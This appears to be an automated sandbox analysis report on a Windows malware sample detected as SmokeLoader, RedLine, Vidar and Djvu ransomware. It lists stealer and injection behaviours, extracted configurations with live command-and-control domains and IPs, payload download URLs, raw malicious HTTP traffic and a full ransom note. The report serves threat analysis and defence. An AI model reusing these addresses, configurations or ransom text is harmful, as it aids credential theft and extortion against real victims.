Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 736968
MD5: 4bb5c0ed18f4b7ae33ba272eae17abf2
SHA1: e0e02b31d3ad2e965d223ebe3451bd9c9e0385fa
SHA256: 418d9b6e1fc560a80fd9f37e34bee51e79a371cfcc24eede84928b506cd918b6
Tags: exe
Infos:

Detection

CryptOne, Djvu, RedLine, SmokeLoader, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Yara detected CryptOne packer
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Registers a DLL
PE file contains more sections than normal
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://95.217.246.41:80/815243149147.zipz Avira URL Cloud: Label: malware
Source: http://95.217.246.41:80/815243149147.zip Avira URL Cloud: Label: malware
Source: http://95.217.246.41/1752 Avira URL Cloud: Label: malware
Source: http://95.217.246.41/ Avira URL Cloud: Label: malware
Source: 78.153.144.3:2510 Avira URL Cloud: Label: malware
Source: http://185.174.137.70/s.exe Avira URL Cloud: Label: malware
Source: http://95.217.246.41:80 Avira URL Cloud: Label: malware
Source: http://starvestitibo.org/Mozilla/5.0 URL Reputation: Label: malware
Source: http://95.217.246.41/815243149147.zip Avira URL Cloud: Label: malware
Source: http://95.217.246.41/m Avira URL Cloud: Label: malware
Source: http://95.217.27.155:80 Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: file.exe Virustotal: Detection: 36% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\37F1.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\405E.exe ReversingLabs: Detection: 38%
Source: C:\Users\user\AppData\Local\Temp\49F6.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\509E.dll ReversingLabs: Detection: 38%
Source: C:\Users\user\AppData\Local\Temp\5487.exe ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Roaming\gecbfdt ReversingLabs: Detection: 38%
Source: C:\Users\user\AppData\Roaming\uucbfdt ReversingLabs: Detection: 39%
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\405E.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5999.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\gecbfdt Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\45DE.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\509E.dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\49F6.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5487.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\uucbfdt Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 18.2.5487.exe.890e67.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 18.3.5487.exe.8f0000.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 30.0.gecbfdt.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.49F6.exe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.2.regsvr32.exe.4ff0184.1.unpack Avira: Label: TR/Kazy.4159236
Source: 15.0.49F6.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.49F6.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.49F6.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 00000000.00000002.356712809.0000000000710000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://hulimudulinu.net/", "http://stalnnuytyt.org/", "http://gulutina49org.org/", "http://furubujjul.net/", "http://starvestitibo.org/", "http://liubertiyyyul.net/", "http://bururutu44org.org/", "http://youyouumenia5.org/", "http://nvulukuluir.net/", "http://nuluitnulo.me/", "http://guluiiiimnstra.net/"]}
Source: 0000000C.00000002.549799190.0000000005F55000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: RedLine {"C2 url": "78.153.144.3:2510", "Bot Id": "slovarik1btc", "Authorization Header": "69236173f96390de00bb5a5120a1f3a0"}
Source: 00000013.00000002.474602203.0000000002370000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Djvu {"Download URLs": ["http://uaery.top/dl/build2.exe", "http://fresherlights.com/files/1/build3.exe"], "C2 url": "http://fresherlights.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-dyi5UcwIT9\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@fishmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0597Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Unpacked PE file: 12.2.37F1.exe.400000.0.unpack
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 185.220.204.64:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: 37F1.exe, 0000000C.00000002.541669029.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\weba\kika.pdb source: 405E.exe, 0000000D.00000000.394848625.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, gecbfdt, 0000001E.00000000.484717133.0000000000401000.00000020.00000001.01000000.00000014.sdmp, 405E.exe.1.dr, gecbfdt.1.dr
Source: Binary string: C:\nefih\xugo.pdb source: 5999.exe, 00000013.00000000.409927020.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe, 00000013.00000002.470817394.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe, 00000019.00000000.431212305.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe.1.dr
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 5999.exe, 00000013.00000002.474602203.0000000002370000.00000040.00001000.00020000.00000000.sdmp, 5999.exe, 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5999.exe, 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5999.exe, 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\hegehi\20\gilecozosixebu gazirule82-kekec.pdb source: file.exe, uucbfdt.1.dr
Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: 37F1.exe, 0000000C.00000002.541669029.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: QDC:\gabotolupajavi\yakorod\pucomenazis.pdb source: 49F6.exe, 0000000F.00000000.399892526.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, 49F6.exe.1.dr
Source: Binary string: nHC:\Windows\System.ServiceModel.pdb source: 37F1.exe, 0000000C.00000002.530857284.0000000000196000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\gix\modabohuva lopehojeha9-kotisotinago\kayuhoki.pdb source: 45DE.exe, 0000000E.00000000.397590247.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 45DE.exe.1.dr
Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbR source: 37F1.exe, 0000000C.00000002.541669029.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: _.pdb source: 37F1.exe, 0000000C.00000002.549799190.0000000005F55000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.545785192.0000000004B70000.00000004.08000000.00040000.00000000.sdmp, 37F1.exe, 0000000C.00000002.544624082.0000000004A4A000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000003.430586809.0000000002EF0000.00000004.00000020.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000003.426623227.0000000002EB9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\gix\modabohuva lopehojeha9-kotisotinago\kayuhoki.pdbx source: 45DE.exe, 0000000E.00000000.397590247.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 45DE.exe.1.dr
Source: Binary string: 1C:\lahikuvobive\puhob.pdbp source: 5487.exe, 00000012.00000000.405253268.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 5487.exe.1.dr
Source: Binary string: C:\gihiyunawajova-92\licirif_zezada\88 lefe.pdb source: 37F1.exe, 0000000C.00000000.391310999.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 37F1.exe.1.dr
Source: Binary string: System.ServiceModel.pdbH source: 37F1.exe, 0000000C.00000002.542633343.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: FC:\weba\kika.pdb source: 405E.exe, 0000000D.00000000.394848625.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, gecbfdt, 0000001E.00000000.484717133.0000000000401000.00000020.00000001.01000000.00000014.sdmp, 405E.exe.1.dr, gecbfdt.1.dr
Source: Binary string: System.ServiceModel.pdb source: 37F1.exe, 0000000C.00000002.542633343.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\lahikuvobive\puhob.pdb source: 5487.exe, 00000012.00000000.405253268.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 5487.exe.1.dr
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 5999.exe, 00000013.00000002.474602203.0000000002370000.00000040.00001000.00020000.00000000.sdmp, 5999.exe, 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5999.exe, 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5999.exe, 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: 37F1.exe, 0000000C.00000002.541669029.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\gabotolupajavi\yakorod\pucomenazis.pdb source: 49F6.exe, 0000000F.00000000.399892526.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, 49F6.exe.1.dr
Source: Binary string: System.ServiceModel.pdbK source: 37F1.exe, 0000000C.00000002.552906667.0000000008132000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ^5C:\nefih\xugo.pdb source: 5999.exe, 00000013.00000000.409927020.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe, 00000013.00000002.470817394.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe, 00000019.00000000.431212305.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe.1.dr
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: o36fafs3sn6xou.com
Source: C:\Windows\explorer.exe Domain query: furubujjul.net
Source: C:\Windows\explorer.exe Domain query: o3zxuhcc4hl9mi.com
Source: C:\Windows\explorer.exe Domain query: o3l3roozuidudu.com
Source: C:\Windows\explorer.exe Network Connect: 185.174.137.70 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: shingroup.com
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 193.106.191.15 80
Source: C:\Windows\SysWOW64\explorer.exe Domain query: starvestitibo.org
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.6:49705 -> 185.174.137.70:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://fresherlights.com/lancer/get.php
Source: Malware configuration extractor URLs: 78.153.144.3:2510
Source: Malware configuration extractor URLs: http://hulimudulinu.net/
Source: Malware configuration extractor URLs: http://stalnnuytyt.org/
Source: Malware configuration extractor URLs: http://gulutina49org.org/
Source: Malware configuration extractor URLs: http://furubujjul.net/
Source: Malware configuration extractor URLs: http://starvestitibo.org/
Source: Malware configuration extractor URLs: http://liubertiyyyul.net/
Source: Malware configuration extractor URLs: http://bururutu44org.org/
Source: Malware configuration extractor URLs: http://youyouumenia5.org/
Source: Malware configuration extractor URLs: http://nvulukuluir.net/
Source: Malware configuration extractor URLs: http://nuluitnulo.me/
Source: Malware configuration extractor URLs: http://guluiiiimnstra.net/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /truemansho HTTP/1.1Host: t.me
Source: global traffic HTTP traffic detected: GET /1752 HTTP/1.1Host: 95.217.246.41
Source: global traffic HTTP traffic detected: GET /815243149147.zip HTTP/1.1Host: 95.217.246.41Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----6180824849005615Host: 95.217.246.41Content-Length: 141137Connection: Keep-AliveCache-Control: no-cache
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 03 Nov 2022 11:46:51 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 03 Nov 2022 11:37:55 GMTETag: "34e00-5ec8f63652d4d"Accept-Ranges: bytesContent-Length: 216576Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1b ac 4c 86 5f cd 22 d5 5f cd 22 d5 5f cd 22 d5 41 9f b7 d5 42 cd 22 d5 41 9f a1 d5 dc cd 22 d5 78 0b 59 d5 58 cd 22 d5 5f cd 23 d5 ce cd 22 d5 41 9f a6 d5 6d cd 22 d5 41 9f b6 d5 5e cd 22 d5 41 9f b3 d5 5e cd 22 d5 52 69 63 68 5f cd 22 d5 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 da 69 b0 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e6 01 00 00 24 17 00 00 00 00 00 16 95 00 00 00 10 00 00 00 00 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 19 00 00 04 00 00 2a 6d 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 e8 01 00 50 00 00 00 00 c0 18 00 10 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 43 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 e4 01 00 00 10 00 00 00 e6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 64 b1 16 00 00 00 02 00 00 20 01 00 00 ea 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 43 00 00 00 c0 18 00 00 44 00 00 00 0a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /upload/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: shingroup.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ihscr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://erlnjwq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://petsisa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://afsgomos.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wovjsp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 144Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ugojjub.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ojgirn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: starvestitibo.org
Source: global traffic HTTP traffic detected: GET /s.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.174.137.70
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kgypm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tigsodvg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tdwofe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gnwpmx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lcnrqc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nduckkr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qtvcgbfk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gafgylgoi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nmqtq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: starvestitibo.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ejmdi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: starvestitibo.org
